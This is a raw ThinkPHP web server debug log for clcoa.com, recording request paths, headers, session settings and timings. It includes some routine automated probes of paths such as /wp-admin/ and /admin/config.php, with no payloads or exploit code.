'47.105.33.115:8081', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002246s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000162s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T21:16:26+08:00 ] 77.36.125.32 GET / [ info ] clcoa.com/ [运行时间:0.026185s][吞吐率:38.19req/s] [内存消耗:3,284.53kb] [文件加载:67] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001099s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept' => '*/*', 'accept-language' => 'en-US,en;q=0.9', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36', 'host' => 'clcoa.com', 'accept-encoding' => 'gzip, deflate, br', ) [ info ] [ PARAM ] array ( ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001468s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000098s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T21:16:26+08:00 ] 77.36.125.32 GET /www.clcoa.com [ info ] clcoa.com/www.clcoa.com [运行时间:0.018229s][吞吐率:54.86req/s] [内存消耗:2,209.27kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001102s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'www.clcoa.com', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept' => '*/*', 'accept-language' => 'en-US,en;q=0.9', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36', 'cookie' => 'PHPSESSID=7197388is4fjihs0ndcblobd05', 'host' => 'clcoa.com', 'accept-encoding' => 'gzip, deflate, br', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T21:24:30+08:00 ] 113.215.188.46 GET / [ info ] 47.105.33.115/ [运行时间:0.027835s][吞吐率:35.93req/s] [内存消耗:3,333.27kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001131s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4939.80 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => '47.105.33.115', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001532s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000106s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T21:24:32+08:00 ] 113.215.188.46 GET / [ info ] 47.105.33.115/ [运行时间:0.029445s][吞吐率:33.96req/s] [内存消耗:3,333.55kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001141s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.3582.139 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => '47.105.33.115', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=psd5kc073hvrhj9464p1bb8ha6', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001856s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000106s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T21:24:32+08:00 ] 113.215.188.46 GET / [ info ] 47.105.33.115/ [运行时间:0.027410s][吞吐率:36.48req/s] [内存消耗:3,333.54kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001079s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.6142.195 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => '47.105.33.115', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=psd5kc073hvrhj9464p1bb8ha6', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001487s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000095s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T21:24:32+08:00 ] 113.215.188.46 GET / [ info ] 47.105.33.115/ [运行时间:0.026380s][吞吐率:37.91req/s] [内存消耗:3,333.55kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001130s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.6155.163 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => '47.105.33.115', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=psd5kc073hvrhj9464p1bb8ha6', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001490s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000092s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T21:49:23+08:00 ] 43.166.242.189 GET / [ info ] www.clcoa.com/ [运行时间:0.028583s][吞吐率:34.99req/s] [内存消耗:3,335.36kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001158s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'www.clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-encoding' => 'gzip', 'accept-language' => 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7', 'cache-control' => 'no-cache', 'connection' => 'keep-alive, close', 'pragma' => 'no-cache', 'upgrade-insecure-requests' => '1', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001558s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000112s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T21:55:52+08:00 ] 64.227.150.159 HEAD / [ info ] clcoa.com/ [运行时间:0.026519s][吞吐率:37.71req/s] [内存消耗:3,333.16kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001153s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'python-requests/2.32.5', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001463s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000094s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T21:55:57+08:00 ] 64.227.150.159 GET /wp-admin/ [ info ] clcoa.com/wp-admin/ [运行时间:0.018459s][吞吐率:54.17req/s] [内存消耗:2,207.09kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001100s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-admin', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1', 'accept-encoding' => 'gzip, deflate', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9', 'connection' => 'keep-alive', 'accept-language' => 'en-US,en;q=0.5', 'referer' => 'binance.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T22:01:18+08:00 ] 102.22.20.125 GET /admin/config.php [ info ] 47.105.33.115/admin/config.php [运行时间:0.023078s][吞吐率:43.33req/s] [内存消耗:2,535.91kb] [文件加载:58] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001132s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'config.php', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'xfa1,nvdorz,nvd0rz', 'accept' => '*/*', 'host' => '47.105.33.115', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001491s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T22:16:03+08:00 ] 38.58.179.181 GET http://check.9tb.org/ [ info ] check.9tb.orghttp://check.9tb.org/ [运行时间:0.027900s][吞吐率:35.84req/s] [内存消耗:3,333.26kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001175s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'check.9tb.org', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001530s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000096s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T22:19:57+08:00 ] 91.199.82.162 GET http://ip-api.com/json/ [ info ] ip-api.comhttp://ip-api.com/json/ [运行时间:0.019600s][吞吐率:51.02req/s] [内存消耗:2,225.24kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001138s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'json', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'ip-api.com', 'user-agent' => 'Go-http-client/1.1', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T22:36:09+08:00 ] 59.82.135.105 GET / [ info ] www.clcoa.com/ [运行时间:0.028727s][吞吐率:34.81req/s] [内存消耗:3,333.27kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001216s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.9407.181 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'www.clcoa.com', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001582s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000104s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T22:36:10+08:00 ] 59.82.135.105 GET / [ info ] www.clcoa.com/ [运行时间:0.029053s][吞吐率:34.42req/s] [内存消耗:3,333.54kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000064s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001123s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.1535.105 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'www.clcoa.com', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=380o5kgv0pi44lhmjnnko6cr55', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001552s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000094s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T22:36:10+08:00 ] 59.82.135.108 GET / [ info ] www.clcoa.com/ [运行时间:0.028219s][吞吐率:35.44req/s] [内存消耗:3,333.54kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001152s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.6548.102 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'www.clcoa.com', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=380o5kgv0pi44lhmjnnko6cr55', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001656s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000106s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T22:36:10+08:00 ] 59.82.135.105 GET / [ info ] www.clcoa.com/ [运行时间:0.029260s][吞吐率:34.18req/s] [内存消耗:3,333.58kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001139s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.1561.97 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'www.clcoa.com', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=380o5kgv0pi44lhmjnnko6cr55', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001597s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000101s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T22:45:38+08:00 ] 59.82.135.92 GET / [ info ] www.clcoa.com/ [运行时间:0.029795s][吞吐率:33.56req/s] [内存消耗:3,333.27kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001272s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.3844.197 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'www.clcoa.com', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001737s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000113s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T22:45:39+08:00 ] 59.82.135.92 GET / [ info ] www.clcoa.com/ [运行时间:0.026430s][吞吐率:37.84req/s] [内存消耗:3,333.58kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001064s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.5670.80 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'www.clcoa.com', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=urn1sn0jrioktfa6elqudlb3l7', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001472s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000104s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T22:45:39+08:00 ] 59.82.135.92 GET / [ info ] www.clcoa.com/ [运行时间:0.028717s][吞吐率:34.82req/s] [内存消耗:3,333.54kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001211s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.8173.83 Safari/537.36', 'accept-encoding' => 'gzip, x-gzip, deflate', 'host' => 'www.clcoa.com', 'connection' => 'keep-alive', 'cookie' => 'PHPSESSID=urn1sn0jrioktfa6elqudlb3l7', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001629s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000108s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T22:45:39+08:00 ] 59.82.135.92 GET / [ info ] 